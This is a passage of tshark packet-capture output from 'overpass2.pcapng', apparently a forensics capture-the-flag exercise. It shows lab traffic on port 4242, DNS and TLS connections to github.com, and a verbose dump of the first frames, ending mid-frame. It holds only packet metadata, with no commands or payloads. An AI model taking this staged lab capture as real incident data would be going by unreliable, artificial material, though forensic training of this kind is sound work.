   66 52.616619251 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=73 Ack=509 Win=65152 Len=0 TSval=3256112326 TSecr=894491489
   67 59.237795390 192.168.170.145 → 192.168.170.159 TCP 66 [TCP Keep-Alive] 47736 → 80 [ACK] Seq=400 Ack=1 Win=64256 Len=0 TSval=3256118947 TSecr=894487870
   68 59.237911793 192.168.170.159 → 192.168.170.145 TCP 66 [TCP Keep-Alive ACK] 80 → 47736 [ACK] Seq=1 Ack=401 Win=64768 Len=0 TSval=894498111 TSecr=3256088284
   69 69.478321357 192.168.170.145 → 192.168.170.159 TCP 66 [TCP Keep-Alive] 47736 → 80 [ACK] Seq=400 Ack=1 Win=64256 Len=0 TSval=3256129188 TSecr=894498111
   70 69.478401749 192.168.170.159 → 192.168.170.145 TCP 66 [TCP Keep-Alive ACK] 80 → 47736 [ACK] Seq=1 Ack=401 Win=64768 Len=0 TSval=894508351 TSecr=3256088284
   71 70.421572879 192.168.170.145 → 192.168.170.159 TCP 75 4242 → 57680 [PSH, ACK] Seq=73 Ack=509 Win=65152 Len=9 TSval=3256130131 TSecr=894491489
   72 70.422063989 192.168.170.159 → 192.168.170.145 TCP 76 57680 → 4242 [PSH, ACK] Seq=509 Ack=82 Win=64256 Len=10 TSval=894509294 TSecr=3256130131
   73 70.422069829 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=82 Ack=519 Win=65152 Len=0 TSval=3256130131 TSecr=894509294
   74 70.423887636 192.168.170.159 → 192.168.170.145 TCP 76 57680 → 4242 [PSH, ACK] Seq=519 Ack=82 Win=64256 Len=10 TSval=894509296 TSecr=3256130131
   75 70.423890196 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=82 Ack=529 Win=65152 Len=0 TSval=3256130133 TSecr=894509296
   76 71.650622407 192.168.170.145 → 192.168.170.159 TCP 89 4242 → 57680 [PSH, ACK] Seq=82 Ack=529 Win=65152 Len=23 TSval=3256131360 TSecr=894509296
   77 71.650937524 192.168.170.159 → 192.168.170.145 TCP 68 57680 → 4242 [PSH, ACK] Seq=529 Ack=105 Win=64256 Len=2 TSval=894510523 TSecr=3256131360
   78 71.650944424 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=105 Ack=531 Win=65152 Len=0 TSval=3256131360 TSecr=894510523
   79 71.674926908 192.168.170.159 → 192.168.170.145 TCP 127 57680 → 4242 [PSH, ACK] Seq=531 Ack=105 Win=64256 Len=61 TSval=894510547 TSecr=3256131360
   80 71.674933498 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=105 Ack=592 Win=65152 Len=0 TSval=3256131384 TSecr=894510547
   81 79.718858510 192.168.170.145 → 192.168.170.159 TCP 66 [TCP Keep-Alive] 47736 → 80 [ACK] Seq=400 Ack=1 Win=64256 Len=0 TSval=3256139428 TSecr=894508351
   82 79.718997584 192.168.170.159 → 192.168.170.145 TCP 66 [TCP Keep-Alive ACK] 80 → 47736 [ACK] Seq=1 Ack=401 Win=64768 Len=0 TSval=894518591 TSecr=3256088284
   83 80.220669335 192.168.170.145 → 192.168.170.159 TCP 71 4242 → 57680 [PSH, ACK] Seq=105 Ack=592 Win=65152 Len=5 TSval=3256139930 TSecr=894510547
   84 80.221093213 192.168.170.159 → 192.168.170.145 TCP 72 57680 → 4242 [PSH, ACK] Seq=592 Ack=110 Win=64256 Len=6 TSval=894519093 TSecr=3256139930
   85 80.221191495 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=110 Ack=598 Win=65152 Len=0 TSval=3256139930 TSecr=894519093
   86 80.221306458 192.168.170.159 → 192.168.170.145 TCP 95 57680 → 4242 [PSH, ACK] Seq=598 Ack=110 Win=64256 Len=29 TSval=894519094 TSecr=3256139930
   87 80.221365069 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=110 Ack=627 Win=65152 Len=0 TSval=3256139930 TSecr=894519094
   88 82.384925514 192.168.170.145 → 192.168.170.159 TCP 75 4242 → 57680 [PSH, ACK] Seq=110 Ack=627 Win=65152 Len=9 TSval=3256142094 TSecr=894519094
   89 82.385349973 192.168.170.159 → 192.168.170.145 TCP 76 57680 → 4242 [PSH, ACK] Seq=627 Ack=119 Win=64256 Len=10 TSval=894521257 TSecr=3256142094
   90 82.385355363 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=119 Ack=637 Win=65152 Len=0 TSval=3256142094 TSecr=894521257
   91 82.386795163 192.168.170.159 → 192.168.170.145 TCP 579 57680 → 4242 [PSH, ACK] Seq=637 Ack=119 Win=64256 Len=513 TSval=894521259 TSecr=3256142094
   92 82.386798183 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=119 Ack=1150 Win=64640 Len=0 TSval=3256142096 TSecr=894521259
   93 82.387045417 192.168.170.159 → 192.168.170.145 TCP 95 57680 → 4242 [PSH, ACK] Seq=1150 Ack=119 Win=64256 Len=29 TSval=894521259 TSecr=3256142096
   94 82.387106419 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=119 Ack=1179 Win=64640 Len=0 TSval=3256142096 TSecr=894521259
   95 85.689999379 192.168.170.145 → 192.168.170.159 TCP 74 4242 → 57680 [PSH, ACK] Seq=119 Ack=1179 Win=64640 Len=8 TSval=3256145399 TSecr=894521259
   96 85.690358617 192.168.170.159 → 192.168.170.145 TCP 75 57680 → 4242 [PSH, ACK] Seq=1179 Ack=127 Win=64256 Len=9 TSval=894524562 TSecr=3256145399
   97 85.690407117 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=127 Ack=1188 Win=64640 Len=0 TSval=3256145399 TSecr=894524562
   98 85.693199973 192.168.170.159 → 192.168.170.145 TCP 93 57680 → 4242 [PSH, ACK] Seq=1188 Ack=127 Win=64256 Len=27 TSval=894524565 TSecr=3256145399
   99 85.693319126 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=127 Ack=1215 Win=64640 Len=0 TSval=3256145402 TSecr=894524565
  100 87.592945663 192.168.170.145 → 192.168.170.159 TCP 89 4242 → 57680 [PSH, ACK] Seq=127 Ack=1215 Win=64640 Len=23 TSval=3256147302 TSecr=894524565
  101 87.594143248 192.168.170.159 → 192.168.170.145 TCP 68 57680 → 4242 [PSH, ACK] Seq=1215 Ack=150 Win=64256 Len=2 TSval=894526466 TSecr=3256147302
  102 87.594229619 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=150 Ack=1217 Win=64640 Len=0 TSval=3256147303 TSecr=894526466
  103 87.599894814 192.168.170.159 → 192.168.170.145 TCP 370 57680 → 4242 [PSH, ACK] Seq=1217 Ack=150 Win=64256 Len=304 TSval=894526472 TSecr=3256147303
  104 87.599948715 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=150 Ack=1521 Win=64384 Len=0 TSval=3256147309 TSecr=894526472
  105 89.958341754 192.168.170.145 → 192.168.170.159 TCP 66 [TCP Keep-Alive] 47736 → 80 [ACK] Seq=400 Ack=1 Win=64256 Len=0 TSval=3256149667 TSecr=894518591
  106 89.958477887 192.168.170.159 → 192.168.170.145 TCP 66 [TCP Keep-Alive ACK] 80 → 47736 [ACK] Seq=1 Ack=401 Win=64768 Len=0 TSval=894528830 TSecr=3256088284
  107 92.969168584 192.168.170.138 → 91.189.91.157 NTP 90 NTP Version 4, client
  108 93.049609940 VMware_f9:85:10 → Broadcast    ARP 60 Who has 192.168.170.138? Tell 192.168.170.2
  109 93.049623211 VMware_82:6c:a5 → VMware_f9:85:10 ARP 42 192.168.170.138 is at 00:0c:29:82:6c:a5
  110 93.049776854 91.189.91.157 → 192.168.170.138 NTP 90 NTP Version 4, server
  111 95.931106336 192.168.170.145 → 192.168.170.159 TCP 87 4242 → 57680 [PSH, ACK] Seq=150 Ack=1521 Win=64384 Len=21 TSval=3256155640 TSecr=894526472
  112 95.931488256 192.168.170.159 → 192.168.170.145 TCP 88 57680 → 4242 [PSH, ACK] Seq=1521 Ack=171 Win=64256 Len=22 TSval=894534803 TSecr=3256155640
  113 95.931564807 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=171 Ack=1543 Win=64384 Len=0 TSval=3256155640 TSecr=894534803
  114 95.935050278 192.168.170.159 → 192.168.170.145 TCP 1528 57680 → 4242 [PSH, ACK] Seq=1543 Ack=171 Win=64256 Len=1462 TSval=894534807 TSecr=3256155640
  115 95.935095939 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=171 Ack=3005 Win=64128 Len=0 TSval=3256155644 TSecr=894534807
  116 95.935531281 192.168.170.159 → 192.168.170.145 TCP 95 57680 → 4242 [PSH, ACK] Seq=3005 Ack=171 Win=64256 Len=29 TSval=894534807 TSecr=3256155644
  117 95.935587742 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=171 Ack=3034 Win=64128 Len=0 TSval=3256155644 TSecr=894534807
  118 98.107828955 VMware_82:6c:a5 → VMware_f9:85:10 ARP 42 Who has 192.168.170.2? Tell 192.168.170.138
  119 98.107934218 VMware_f9:85:10 → VMware_82:6c:a5 ARP 60 192.168.170.2 is at 00:50:56:f9:85:10
  120 130.788992697 192.168.170.145 → 192.168.170.159 TCP 118 4242 → 57680 [PSH, ACK] Seq=171 Ack=3034 Win=64128 Len=52 TSval=3256190497 TSecr=894534807
  121 130.789693015 192.168.170.159 → 192.168.170.145 TCP 121 57680 → 4242 [PSH, ACK] Seq=3034 Ack=223 Win=64256 Len=55 TSval=894569661 TSecr=3256190497
  122 130.789742216 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=223 Ack=3089 Win=64128 Len=0 TSval=3256190497 TSecr=894569661
  123 130.790524817 192.168.170.159 → 192.168.170.145 TCP 98 57680 → 4242 [PSH, ACK] Seq=3089 Ack=223 Win=64256 Len=32 TSval=894569661 TSecr=3256190497
  124 130.790594169 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=223 Ack=3121 Win=64128 Len=0 TSval=3256190498 TSecr=894569661
  125 130.812969381 192.168.170.159 → 192.168.170.2 DNS 81 Standard query 0xea9e A github.com OPT
  126 130.813022012 192.168.170.159 → 192.168.170.2 DNS 81 Standard query 0xa865 AAAA github.com OPT
  127 130.821353619 VMware_f9:85:10 → Broadcast    ARP 60 Who has 192.168.170.159? Tell 192.168.170.2
  128 130.821367729 VMware_6e:18:17 → VMware_f9:85:10 ARP 60 192.168.170.159 is at 00:0c:29:6e:18:17
  129 130.821456311 192.168.170.2 → 192.168.170.159 DNS 165 Standard query response 0xa865 AAAA github.com SOA ns-1707.awsdns-21.co.uk OPT
  130 130.834210483 192.168.170.2 → 192.168.170.159 DNS 97 Standard query response 0xea9e A github.com A 140.82.118.4 OPT
  131 130.840570509 192.168.170.159 → 140.82.118.4 TCP 74 42174 → 443 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=1118180778 TSecr=0 WS=128
  132 130.868572111 140.82.118.4 → 192.168.170.159 TCP 60 443 → 42174 [SYN, ACK] Seq=0 Ack=1 Win=64240 Len=0 MSS=1460
  133 130.868722995 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1 Ack=1 Win=64240 Len=0
  134 130.894779433 192.168.170.159 → 140.82.118.4 TLSv1 290 Client Hello
  135 130.894864666 140.82.118.4 → 192.168.170.159 TCP 60 443 → 42174 [ACK] Seq=1 Ack=237 Win=64240 Len=0
  136 130.923858220 140.82.118.4 → 192.168.170.159 TLSv1.2 1490 Server Hello
  137 130.923918441 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=237 Ack=1437 Win=63184 Len=0
  138 130.924009433 140.82.118.4 → 192.168.170.159 TLSv1.2 2058 Certificate, Server Key Exchange, Server Hello Done
  139 130.924070965 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=237 Ack=3441 Win=63184 Len=0
  140 130.924943889 192.168.170.159 → 140.82.118.4 TLSv1.2 129 Client Key Exchange
  141 130.925008519 192.168.170.159 → 140.82.118.4 TLSv1.2 105 Change Cipher Spec, Encrypted Handshake Message
  142 130.925010399 140.82.118.4 → 192.168.170.159 TCP 60 443 → 42174 [ACK] Seq=3441 Ack=312 Win=64240 Len=0
  143 130.925010899 140.82.118.4 → 192.168.170.159 TCP 60 443 → 42174 [ACK] Seq=3441 Ack=363 Win=64240 Len=0
  144 131.038254985 140.82.118.4 → 192.168.170.159 TLSv1.2 105 Change Cipher Spec, Encrypted Handshake Message
  145 131.038924192 192.168.170.159 → 140.82.118.4 TLSv1.2 282 Application Data
  146 131.038973985 140.82.118.4 → 192.168.170.159 TCP 60 443 → 42174 [ACK] Seq=3492 Ack=591 Win=64240 Len=0
  147 131.405066405 140.82.118.4 → 192.168.170.159 TLSv1.2 474 Application Data
  148 131.413988747 140.82.118.4 → 192.168.170.159 TLSv1.2 88 Application Data
  149 131.414117629 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=591 Ack=3946 Win=63184 Len=0
  150 131.415503346 140.82.118.4 → 192.168.170.159 TLSv1.2 408 Application Data
  151 131.415743931 140.82.118.4 → 192.168.170.159 TLSv1.2 152 Application Data
  152 131.415819643 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=591 Ack=4398 Win=63184 Len=0
  153 131.416248475 140.82.118.4 → 192.168.170.159 TLSv1.2 86 Application Data
  154 131.416464271 140.82.118.4 → 192.168.170.159 TLSv1.2 94 Application Data
  155 131.416543553 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=591 Ack=4470 Win=63184 Len=0
  156 131.418370130 192.168.170.159 → 140.82.118.4 TLSv1.2 490 Application Data
  157 131.418445612 140.82.118.4 → 192.168.170.159 TCP 60 443 → 42174 [ACK] Seq=4470 Ack=1027 Win=64240 Len=0
  158 131.738353327 140.82.118.4 → 192.168.170.159 TLSv1.2 422 Application Data
  159 131.754083486 140.82.118.4 → 192.168.170.159 TLSv1.2 86 Application Data
  160 131.754418814 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=4870 Win=63184 Len=0
  161 131.754441005 140.82.118.4 → 192.168.170.159 TLSv1.2 93 Application Data
  162 131.762910965 140.82.118.4 → 192.168.170.159 TLSv1.2 208 Application Data, Application Data
  163 131.763032179 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=5063 Win=63184 Len=0
  164 131.763155262 192.168.170.159 → 192.168.170.145 TCP 160 57680 → 4242 [PSH, ACK] Seq=3121 Ack=223 Win=64256 Len=94 TSval=894570634 TSecr=3256190498
  165 131.763270215 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=223 Ack=3215 Win=64128 Len=0 TSval=3256191471 TSecr=894570634
  166 131.788967723 140.82.118.4 → 192.168.170.159 TLSv1.2 1406 Application Data
  167 131.789534609 192.168.170.145 → 192.168.170.159 TCP 66 [TCP ACKed unseen segment] 4242 → 57680 [ACK] Seq=223 Ack=4860 Win=63488 Len=0 TSval=3256191497 TSecr=894570660
  168 131.789545279 192.168.170.159 → 192.168.170.145 TCP 1711 [TCP Spurious Retransmission] 57680 → 4242 [PSH, ACK] Seq=3215 Ack=223 Win=64256 Len=1645 TSval=894570660 TSecr=3256191471
  169 131.834482227 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=6415 Win=63184 Len=0
  170 131.838951814 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
  171 131.839037965 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=7814 Win=63184 Len=0
  172 131.839105227 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
  173 131.839150978 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=9213 Win=63184 Len=0
  174 131.847695021 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
  175 131.847756852 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=10612 Win=63184 Len=0
  176 131.847865055 140.82.118.4 → 192.168.170.159 TLSv1.2 1490 Application Data
  177 131.847870295 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=12048 Win=63184 Len=0
  178 131.848434910 192.168.170.159 → 140.82.118.4 TCP 60 [TCP ACKed unseen segment] 42174 → 443 [ACK] Seq=1027 Ack=14846 Win=63184 Len=0
  179 131.848437620 140.82.118.4 → 192.168.170.159 TCP 2852 [TCP Spurious Retransmission] 443 → 42174 [PSH, ACK] Seq=12048 Ack=1027 Win=64240 Len=2798
  180 131.848852261 140.82.118.4 → 192.168.170.159 TLSv1.2 774 Ignored Unknown Record
  181 131.848906412 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=15566 Win=63184 Len=0
  182 131.849720413 192.168.170.159 → 192.168.170.145 TCP 100 57680 → 4242 [PSH, ACK] Seq=4860 Ack=223 Win=64256 Len=34 TSval=894570721 TSecr=3256191497
  183 131.849772045 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=223 Ack=4894 Win=64128 Len=0 TSval=3256191557 TSecr=894570721
  184 131.849868017 192.168.170.159 → 192.168.170.145 TCP 100 57680 → 4242 [PSH, ACK] Seq=4894 Ack=223 Win=64256 Len=34 TSval=894570721 TSecr=3256191557
  185 131.849869847 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=223 Ack=4928 Win=64128 Len=0 TSval=3256191558 TSecr=894570721
  186 131.849980410 192.168.170.159 → 192.168.170.145 TCP 100 57680 → 4242 [PSH, ACK] Seq=4928 Ack=223 Win=64256 Len=34 TSval=894570721 TSecr=3256191558
  187 131.849982040 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=223 Ack=4962 Win=64128 Len=0 TSval=3256191558 TSecr=894570721
  188 131.850048142 192.168.170.159 → 192.168.170.145 TCP 100 57680 → 4242 [PSH, ACK] Seq=4962 Ack=223 Win=64256 Len=34 TSval=894570721 TSecr=3256191558
  189 131.850124294 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=223 Ack=4996 Win=64128 Len=0 TSval=3256191558 TSecr=894570721
  190 131.850181165 192.168.170.159 → 192.168.170.145 TCP 100 57680 → 4242 [PSH, ACK] Seq=4996 Ack=223 Win=64256 Len=34 TSval=894570721 TSecr=3256191558
  191 131.850182615 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=223 Ack=5030 Win=64128 Len=0 TSval=3256191558 TSecr=894570721
  192 131.850278739 192.168.170.159 → 192.168.170.145 TCP 100 57680 → 4242 [PSH, ACK] Seq=5030 Ack=223 Win=64256 Len=34 TSval=894570721 TSecr=3256191558
  193 131.850280589 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=223 Ack=5064 Win=64128 Len=0 TSval=3256191558 TSecr=894570721
  194 131.850374910 192.168.170.159 → 192.168.170.145 TCP 100 57680 → 4242 [PSH, ACK] Seq=5064 Ack=223 Win=64256 Len=34 TSval=894570721 TSecr=3256191558
  195 131.850376470 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=223 Ack=5098 Win=64128 Len=0 TSval=3256191558 TSecr=894570721
  196 131.873954554 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
  197 131.874032897 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=16965 Win=63184 Len=0
  198 131.874433746 140.82.118.4 → 192.168.170.159 TLSv1.2 1490 Application Data
  199 131.874441207 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=18401 Win=63184 Len=0
  200 131.874636281 140.82.118.4 → 192.168.170.159 TLSv1.2 1416 Application Data
  201 131.874638441 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=19763 Win=63184 Len=0
  202 131.875027452 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
  203 131.875054433 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=21162 Win=63184 Len=0
  204 131.924706244 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
  205 131.924810547 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=22561 Win=63184 Len=0
  206 131.925254738 140.82.118.4 → 192.168.170.159 TLSv1.2 2210 Application Data, Application Data
  207 131.925324681 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=24717 Win=63184 Len=0
  208 132.044977929 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
  209 132.045027690 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=26116 Win=63184 Len=0
  210 132.045108132 140.82.118.4 → 192.168.170.159 TLSv1.2 2889 Application Data, Application Data
  211 132.045156342 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=28951 Win=63184 Len=0
  212 132.045575673 140.82.118.4 → 192.168.170.159 TLSv1.2 1416 Application Data
  213 132.045640405 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=30313 Win=63184 Len=0
  214 132.046020945 140.82.118.4 → 192.168.170.159 TLSv1.2 1490 Application Data
  215 132.046175449 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=31749 Win=63184 Len=0
  216 132.046181229 140.82.118.4 → 192.168.170.159 TLSv1.2 2815 Application Data, Application Data
  217 132.046269741 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=34510 Win=63184 Len=0
  218 132.046508518 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=37382 Win=63184 Len=0
  219 132.046515448 140.82.118.4 → 192.168.170.159 TCP 2926 [TCP Spurious Retransmission] 443 → 42174 [PSH, ACK] Seq=34510 Ack=1027 Win=64240 Len=2872
  220 132.046943999 140.82.118.4 → 192.168.170.159 TLSv1.2 2778 Ignored Unknown Record
  221 132.046995951 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=40106 Win=63184 Len=0
  222 132.047117094 140.82.118.4 → 192.168.170.159 TLSv1.2 1321 Application Data
  223 132.047219827 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=41373 Win=63184 Len=0
  224 132.094178628 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
  225 132.094319951 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=42772 Win=63184 Len=0
  226 132.094446085 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
  227 132.129676781 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
  228 132.129759233 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=45570 Win=63184 Len=0
  229 132.129963958 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
  230 132.130342869 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
  231 132.130344819 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=48368 Win=63184 Len=0
  232 132.171939650 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
  233 132.172162936 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
  234 132.172169976 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=51166 Win=63184 Len=0
  235 132.178881331 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
  236 132.179088046 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
  237 132.179151938 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=53964 Win=63184 Len=0
  238 132.213735698 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
  239 132.214095967 140.82.118.4 → 192.168.170.159 TLSv1.2 1453 Application Data
  240 132.214176359 192.168.170.159 → 140.82.118.4 TCP 60 42174 → 443 [ACK] Seq=1027 Ack=56762 Win=63184 Len=0

REST OF THE INFO........

WE LOOK AT PART OF THE OUTPUT IN VERBOSE MODE:

┌──(root㉿kalipaimon)-[/home/paimon/Descargas]
└─# tshark -r overpass2.pcapng -V
Running as user "root" and group "root". This could be dangerous.
Frame 1: 74 bytes on wire (592 bits), 74 bytes captured (592 bits) on interface ens33, id 0
    Section number: 1
    Interface id: 0 (ens33)
        Interface name: ens33
    Encapsulation type: Ethernet (1)
    Arrival Time: Jul 21, 2020 17:33:53.162229164 -03
    [Time shift for this packet: 0.000000000 seconds]
    Epoch Time: 1595363633.162229164 seconds
    [Time delta from previous captured frame: 0.000000000 seconds]
    [Time delta from previous displayed frame: 0.000000000 seconds]
    [Time since reference or first frame: 0.000000000 seconds]
    Frame Number: 1
    Frame Length: 74 bytes (592 bits)
    Capture Length: 74 bytes (592 bits)
    [Frame is marked: False]
    [Frame is ignored: False]
    [Protocols in frame: eth:ethertype:ip:tcp]
Ethernet II, Src: VMware_17:ba:48 (00:0c:29:17:ba:48), Dst: VMware_6e:18:17 (00:0c:29:6e:18:17)
    Destination: VMware_6e:18:17 (00:0c:29:6e:18:17)
        Address: VMware_6e:18:17 (00:0c:29:6e:18:17)
        .... ..0. .... .... .... .... = LG bit: Globally unique address (factory default)
        .... ...0 .... .... .... .... = IG bit: Individual address (unicast)
    Source: VMware_17:ba:48 (00:0c:29:17:ba:48)
        Address: VMware_17:ba:48 (00:0c:29:17:ba:48)
        .... ..0. .... .... .... .... = LG bit: Globally unique address (factory default)
        .... ...0 .... .... .... .... = IG bit: Individual address (unicast)
    Type: IPv4 (0x0800)
Internet Protocol Version 4, Src: 192.168.170.145, Dst: 192.168.170.159
    0100 .... = Version: 4
    .... 0101 = Header Length: 20 bytes (5)
    Differentiated Services Field: 0x00 (DSCP: CS0, ECN: Not-ECT)
        0000 00.. = Differentiated Services Codepoint: Default (0)
        .... ..00 = Explicit Congestion Notification: Not ECN-Capable Transport (0)
    Total Length: 60
    Identification: 0xd0e5 (53477)
    010. .... = Flags: 0x2, Don't fragment
        0... .... = Reserved bit: Not set
        .1.. .... = Don't fragment: Set
        ..0. .... = More fragments: Not set
    ...0 0000 0000 0000 = Fragment Offset: 0
    Time to Live: 64
    Protocol: TCP (6)
    Header Checksum: 0x9354 [validation disabled]
    [Header checksum status: Unverified]
    Source Address: 192.168.170.145
    Destination Address: 192.168.170.159
Transmission Control Protocol, Src Port: 47732, Dst Port: 80, Seq: 0, Len: 0
    Source Port: 47732
    Destination Port: 80
    [Stream index: 0]
    [Conversation completeness: Incomplete (0)]
    [TCP Segment Len: 0]
    Sequence Number: 0    (relative sequence number)
    Sequence Number (raw): 2491250218
    [Next Sequence Number: 1    (relative sequence number)]
    Acknowledgment Number: 0
    Acknowledgment number (raw): 0
    1010 .... = Header Length: 40 bytes (10)
    Flags: 0x002 (SYN)
        000. .... .... = Reserved: Not set
        ...0 .... .... = Accurate ECN: Not set
        .... 0... .... = Congestion Window Reduced: Not set
        .... .0.. .... = ECN-Echo: Not set
        .... ..0. .... = Urgent: Not set
        .... ...0 .... = Acknowledgment: Not set
        .... .... 0... = Push: Not set
        .... .... .0.. = Reset: Not set
        .... .... ..1. = Syn: Set
            [Expert Info (Chat/Sequence): Connection establish request (SYN): server port 80]
                [Connection establish request (SYN): server port 80]
                [Severity level: Chat]
                [Group: Sequence]
        .... .... ...0 = Fin: Not set
        [TCP Flags: ··········S·]
    Window: 64240
    [Calculated window size: 64240]
    Checksum: 0x67cd [unverified]
    [Checksum Status: Unverified]
    Urgent Pointer: 0
    Options: (20 bytes), Maximum segment size, SACK permitted, Timestamps, No-Operation (NOP), Window scale
        TCP Option - Maximum segment size: 1460 bytes
            Kind: Maximum Segment Size (2)
            Length: 4
            MSS Value: 1460
        TCP Option - SACK permitted
            Kind: SACK Permitted (4)
            Length: 2
        TCP Option - Timestamps
            Kind: Time Stamp Option (8)
            Length: 10
            Timestamp value: 3256059711: TSval 3256059711, TSecr 0
            Timestamp echo reply: 0
        TCP Option - No-Operation (NOP)
            Kind: No-Operation (1)
        TCP Option - Window scale: 7 (multiply by 128)
            Kind: Window Scale (3)
            Length: 3
            Shift count: 7
            [Multiplier: 128]
    [Timestamps]
        [Time since first frame in this TCP stream: 0.000000000 seconds]
        [Time since previous frame in this TCP stream: 0.000000000 seconds]

Frame 2: 74 bytes on wire (592 bits), 74 bytes captured (592 bits) on interface ens33, id 0
    Section number: 1
    Interface id: 0 (ens33)
        Interface name: ens33
    Encapsulation type: Ethernet (1)
    Arrival Time: Jul 21, 2020 17:33:53.162351706 -03
    [Time shift for this packet: 0.000000000 seconds]
    Epoch Time: 1595363633.162351706 seconds
    [Time delta from previous captured frame: 0.000122542 seconds]
    [Time delta from previous displayed frame: 0.000122542 seconds]
    [Time since reference or first frame: 0.000122542 seconds]
    Frame Number: 2
    Frame Length: 74 bytes (592 bits)
    Capture Length: 74 bytes (592 bits)
    [Frame is marked: False]
    [Frame is ignored: False]
